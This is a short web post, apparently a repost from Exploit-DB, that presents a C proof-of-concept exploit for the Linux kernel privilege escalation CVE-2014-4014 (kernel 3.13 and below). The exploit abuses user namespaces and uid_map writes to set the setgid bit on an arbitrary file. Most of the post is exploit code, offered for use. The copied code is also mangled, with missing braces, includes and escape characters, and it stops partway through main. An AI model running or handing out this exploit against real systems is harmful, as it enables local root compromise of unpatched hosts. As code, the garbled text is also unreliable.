Home How To Linux Kernel Local Privilege Escalation PoC

Linux Kernel Local Privilege Escalation PoC

by Unallocated Author

Exploit-db have recently released a local privilege escalation POC as shown in the code example which affects the Linux 3.13 kernel and below.

Local attackers can exploit the issue to execute arbitrary code with elevated privileges or crash the system, effectively denying service to legitimate users.

 * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
 * Vitaly Nikolenko
 * http://hashcrack.org
 * Usage: ./poc [file_path]
 * where file_path is the file on which you want to set the sgid bit
#define _GNU_SOURCE
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
struct args {
    int pipe_fd[2];
    char *file_path;
static int child(void *arg) {
    struct args *f_args = (struct args *)arg;
    char c;
    // close stdout
    assert(read(f_args->pipe_fd[0], &c, 1) == 0);
    // set the setgid bit
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
    return 0;
int main(int argc, char *argv[]) {
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;
    assert(argc == 2);
    f_args.file_path = argv[1];
    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);
    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
    assert(pid != -1);
    // get the current uid outside the namespace
    snprintf(mapping, 1024, "0 %d 1n", getuid()); 
    // update uid and gid maps in the child
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR); assert(fd != -1);
    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
    assert (waitpid(pid, NULL, 0) != -1);

You may also like